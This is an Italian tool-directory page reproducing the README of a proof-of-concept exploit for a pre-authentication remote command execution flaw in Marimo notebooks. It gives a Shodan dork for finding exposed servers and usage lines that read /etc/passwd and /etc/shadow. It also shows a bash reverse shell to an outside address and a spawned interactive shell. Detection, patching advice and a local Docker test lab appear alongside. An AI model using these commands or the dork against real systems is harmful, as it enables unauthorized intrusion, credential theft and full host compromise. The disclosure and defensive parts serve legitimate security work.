Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
marimo_CVE-2026-39987_RCE_PoC — PoC di CVE-2026-39987: RCE pre-autenticazione via WebSocket in Marimo precedente alla 0.23.0 (CVSS 9.3). | Kitploit
Strumenti/GitHubGitHub/fevar54/marimo_cve-2026-39987_rce_poc
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubfevar54/marimo_cve-2026-39987_rce_poc

marimo_CVE-2026-39987_RCE_PoC

PoC di CVE-2026-39987: RCE pre-autenticazione via WebSocket in Marimo precedente alla 0.23.0 (CVSS 9.3).

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
14 mesi faNon ancora revisionato
Condividi

CVE-2026-39987 - Marimo < 0.23.0 Pre-Auth RCE (WebSocket)

⚠️ AVVISO LEGALE ⚠️

Questo script è SOLO a scopo educativo e per test autorizzati. L'uso non autorizzato di questo strumento contro sistemi senza permesso esplicito è ILLEGALE. L'autore non è responsabile dell'uso improprio di queste informazioni.

📋 Descrizione

Le versioni di Marimo precedenti alla 0.23.0 presentano una vulnerabilità critica di esecuzione remota di comandi (RCE) senza autenticazione preventiva. L'endpoint /terminal/ws non implementa controlli di accesso adeguati, consentendo a un attaccante non autenticato di ottenere una shell interattiva completa sul sistema.

DettaglioInformazione
CVECVE-2026-39987
GravitàCRITICA
Punteggio CVSS9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H)
TipoPre-Auth Remote Code Execution (RCE)
VettoreWebSocket (/terminal/ws)
Prodotto AffettoMarimo < 0.23.0
PatchMarimo ≥ 0.23.0

🎯 Impatto

  • ✅ Esecuzione remota di comandi SENZA autenticazione
  • ✅ Shell interattiva PTY completa
  • ✅ Compromissione totale del sistema
  • ✅ Accesso a dati sensibili
  • ✅ Possibile movimento laterale nella rete

🔍 Identificazione

Shodan Dork

http.favicon.hash:-1864630356

text

Fingerprint

  • Hash favicon: -1864630356
  • Endpoint versione: /api/version

💀 PoC di Sfruttamento

Requisiti

root@kitploit:~
pip install websockets requests
Uso Base
bash
python CVE-2026-39987_PoC.py http://vittima.com:8080 "id"
Esempi
bash
# Ottenere informazioni sul sistema
python CVE-2026-39987_PoC.py http://target.com:8080 "id"
python CVE-2026-39987_PoC.py http://target.com:8080 "uname -a"
python CVE-2026-39987_PoC.py http://target.com:8080 "whoami"

# Leggere file sensibili
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/passwd"
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/shadow"

# Reverse shell
python CVE-2026-39987_PoC.py http://target.com:8080 "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

# Shell interattiva
python CVE-2026-39987_PoC.py http://target.com:8080 "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
🛡️ Rilevamento (Sicuro)
Script di rilevamento passivo
bash
python detector.py -u http://target.com:8080
python detector.py -l urls.txt
Modello Nuclei
yaml
# marimo-cve-2026-39987.yaml
id: CVE-2026-39987

info:
  name: Marimo < 0.23.0 Pre-Auth RCE
  severity: critical
  # ... (modello completo incluso)
🔧 Rimedio
Immediato
SCOLLEGARE il sistema dalla rete se è esposto

Bloccare l'accesso alla porta su cui gira Marimo

Controllare i log per attività sospette

Permanente
bash
# Aggiornare alla versione patchata
pip install --upgrade marimo>=0.23.0

# Verificare la versione
marimo --version

# Configurare l'autenticazione se esposto pubblicamente
# NON esporre MAI 'marimo edit' direttamente su internet

Docker (Ambiente vulnerabile)
bash
# Eseguire la versione vulnerabile per i test
docker run -p 8080:8080 marimo-team/marimo:0.22.0

# Verificare la vulnerabilità
python CVE-2026-39987_detector.py http://localhost:8080

# Sfruttare
python CVE-2026-39987_PoC.py http://localhost:8080 "id"

GitHub Security Advisory

NVD Entry

Pull Request #9098

Documentazione Marimo

👥 Crediti
Scoperta: [Nome del ricercatore]

Sviluppo PoC: [Il tuo nome]

Patch: Marimo Team

📜 Licenza
Questo progetto è solo a scopo educativo. L'uso di questo software è a tuo rischio.

⭐ Se questo README ti è stato utile, considera di dare una stella al repository.

⚠️ RICORDA: CON GRANDI POTERI DERIVANO GRANDI RESPONSABILITÀ
Scarica lo strumento